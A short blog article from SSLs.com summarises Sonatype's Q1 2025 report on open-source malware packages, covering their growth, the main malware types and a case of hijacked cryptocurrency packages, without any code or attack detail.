Open-source software is integral to keeping the Internet up and running, as well as critical tech infrastructure across the world. It’s an indispensable part of everyone’s everyday lives, even if they don’t know it.
Despite its overall positive influence on the online world, open-source software isn’t without risk. Unfortunately, according to recent data from software supply chain security company Sonatype, the risk is increasing, particularly when it comes to malware. Its Open Source Malware Index Q1 2025 reports that they discovered 17,954 open-source malware packages in the first quarter of 2025 alone, which is a 230% increase from the same period last year.
Before we take a closer look at the data, let’s explore what makes open-source software vulnerable to malware.
What is open-source malware?
Open-source malware refers to open-source software that has malicious code embedded within. Ironically, the benefits of open-source software also make it an appealing target for cybercriminals. This includes:
Open accessibility
Because open-source code is publicly available, cybercriminals can repurpose it for malicious activities fairly easily.
Trust-based ecosystem
Trust is integral to how the open-source community operates. This can sometimes mean there are fewer rigorous security checks than for proprietary software development. Cybercriminals exploit this trust in several ways, such as contributing malicious malware themselves or compromising contributors’ accounts to inject malware.
Wide distribution
As we’ve mentioned already, open-source projects are critical to a wide variety of apps and services. So malicious code can spread widely within a very short time, potentially impacting a whole host of organizations and users globally
What the Q1 data shows
The researchers analyzed the data and made some interesting discoveries. The most common type of malware was related to data exfiltration. It made up 56% of the open-source malware packages. This is software that can steal sensitive data from an infected system.
Crypto-mining malware has doubled since the final quarter of 2024, now accounting for 7% of malicious packages in the first quarter of 2025. 80% of packages featured more sophisticated and threatening types of malware, such as droppers and code injection malware.
The report also dives into some notable discoveries, one of which is a case where ten popular and legitimate cryptocurrency packages were hijacked and changed to include malicious payloads that aim to steal sensitive information. Each package still performed its original function, all the while stealing data like user profile and directory listings. This case of open source software corruption is all the more notable, considering how trust is integral to how it functions.
Cora is a digital copywriter for SSLs.com. Having eight years of experience in online content creation, she is a versatile writer with an interest in a wide variety of topics, ranging from technology to marketing.